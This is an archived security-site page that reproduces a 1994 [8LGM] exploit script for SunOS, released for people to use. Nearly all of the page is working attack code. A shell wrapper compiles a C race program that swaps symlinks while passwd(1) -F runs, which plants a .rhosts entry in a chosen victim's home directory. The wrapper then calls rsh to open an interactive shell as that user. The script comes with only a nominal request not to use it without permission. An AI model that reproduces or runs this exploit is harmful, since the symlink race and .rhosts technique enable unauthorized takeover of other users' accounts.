TUCoPS :: SunOS/Solaris :: sunps-sh.txt

SunOS passwd(1) flaw exploit - become an arbitrary user 

#!/bin/sh
#
# Syntax: passwdscript target-user
#
# This exploits a flaw in SunOS passwd(1), and attempts
# to become the specified 'user', by creating a .rhosts
# file and using rsh.
#
# Written 1994 by [8LGM]
# Please do not use this script without permission.
#
PATH=/usr/ucb:/usr/bin:/bin      export PATH
IFS=" "                          export IFS

PROG="`basename $0`"

# Check args
if [ $# -ne 1 ]; then
        echo "Syntax: $PROG user target-file rsh-user"
        exit 1
fi
TARGET_USER="$1"

# Check we're on SunOS
if [ "x`uname -s`" != "xSunOS" ]; then
        echo "Sorry, this only works on SunOS"
        exit 1
fi

# Make the race program
cat >passwdrace.c << 'EOF'
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <signal.h>
#include <pwd.h>


main(argc, argv)
int argc;
char *argv[];
{
        FILE    *passwd_in, *passwd_out;
	int	race_child_pid = -1;
	struct	stat st;
	struct	passwd *pw;
	char	pwd_link[256], pwd_dir[256], pwd_file[256], ptmp[256],
		buf[1024], cmd[256], nowhere[256], nowhere2[256],
		dir[256];

	if (argc != 2) {
		fprintf(stderr, "Usage: %s target-user\n",
			argv[0]);
		exit(1);
	}

	/*
	 * Get Target User info
	 */
	if ((pw = getpwnam(argv[1])) == NULL) {
		fprintf(stderr, "%s: user \"%s\" doesnt seem to exist.\n",
			argv[0], argv[1]);
		exit(1);
	}
	strcpy(dir, pw->pw_dir);

	/*
	 * Set up names for directories/links we will access
	 */
	sprintf(pwd_link, "/tmp/passwd-link.%d", getpid());
	sprintf(pwd_dir, "/tmp/passwd-dir.%d", getpid());
	sprintf(nowhere, "/tmp/passwd-nowhere.%d", getpid());
	sprintf(nowhere2, "/tmp/passwd-nowhere2.%d", getpid());
	sprintf(ptmp, "%s/ptmp", dir);
	symlink(pwd_dir, pwd_link);

	/*
	 * Build temp password file in /tmp/passwd-dir.$$/.rhosts.
	 * The bigger our 'passwd file', the longer passwd(1) takes
	 * to write it out, the greater chance we have of noticing
	 * it doing so and winning the race.
	 */
	mkdir(pwd_dir, 0700);
	sprintf(pwd_file, "%s/.rhosts", pwd_dir);
	if ((passwd_out = fopen(pwd_file, "w+")) == NULL) {
		fprintf(stderr, "Cant open %s!\n", pwd_file);
		exit(1);
	}
	if ((passwd_in = fopen("/etc/passwd", "r")) == NULL) {
		fprintf(stderr, "Cant open /etc/passwd\n");
		exit(1);
	}
	if ((pw = getpwuid(getuid())) == NULL) {
		fprintf(stderr, "Who are you?\n");
		exit(1);
	}
	fprintf(passwd_out, "localhost %s ::::::\n", pw->pw_name);
	for (;;) {
		fseek(passwd_in, 0L, SEEK_SET);
		while(fgets(buf, sizeof(buf), passwd_in))
			fputs(buf, passwd_out);
		if (ftell(passwd_out) > 32768)
			break;
	}
	fclose(passwd_in);
	fflush(passwd_out);

	/*
	 * Fork a new process.  In the parent, run passwd -F.
	 * In the child, run the race process(es).
	 */
	if ((race_child_pid = fork()) < 0) {
		perror("fork");
		exit(1);
	}
	if (race_child_pid) {
		/*
		 * Parent - run passwd -F
		 */
		sprintf(pwd_file, "%s/.rhosts", pwd_link);
		puts("Wait until told you see \"Enter your password now!\"");
		sprintf(cmd, "/usr/bin/passwd -F %s", pwd_file);
		system(cmd);
		kill(race_child_pid, 9);
		exit(0);
	} else {
		/*
		 * Child
		 */
		int fd = fileno(passwd_out);
		time_t last_access;

		/*
		 * Remember the current 'last accessed'
		 * time for our password file.  Once this
		 * changes it, we know passwd(1) is reading
		 * it, and we can switch the symlink.
		 */
		if (fstat(fd, &st)) {
			perror("fstat");
			exit(1);
		}
		last_access = st.st_atime;

		/*
		 * Give passwd(1) a chance to start up.
		 * and do its initialisations.  Hopefully
		 * by now, its asked the user for their
		 * password.
		 */
		sleep(5);
		write(0, "Enter your password now!\n",
		      sizeof("Enter your password now!\n"));

		/*
		 * Link our directory to our target directory
		 */
		unlink(pwd_link);
		symlink(dir, pwd_link);

		/*
		 * Create two links pointing to nowhere.
		 * We use rename(2) to switch these in later.
		 * (Using unlink(2)/symlink(2) is too slow).
		 */
		symlink(pwd_dir, nowhere);
		symlink(dir, nowhere2);

		/*
		 * Wait until ptmp exists in our target
		 * dir, then switch the link.
		 */
		while ((open(ptmp, O_RDONLY)==-1));
		rename(nowhere, pwd_link);
		
		/*
		 * Wait until passwd(1) has accessed our
		 * 'password file', then switch the link.
		 */
		while (last_access == st.st_atime)
			fstat(fd, &st);
		rename(nowhere2, pwd_link);
	}
}
EOF
cc -O -o passwdrace passwdrace.c

# Check we now have passwdrace
if [ ! -x "passwdrace" ]; then
        echo "$PROG: couldnt compile passwdrace.c - check it out"
        exit 1
fi

# Start passwdrace
./passwdrace $TARGET_USER

# Try to rsh
rsh localhost -l $TARGET_USER sh -i
exit 0

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH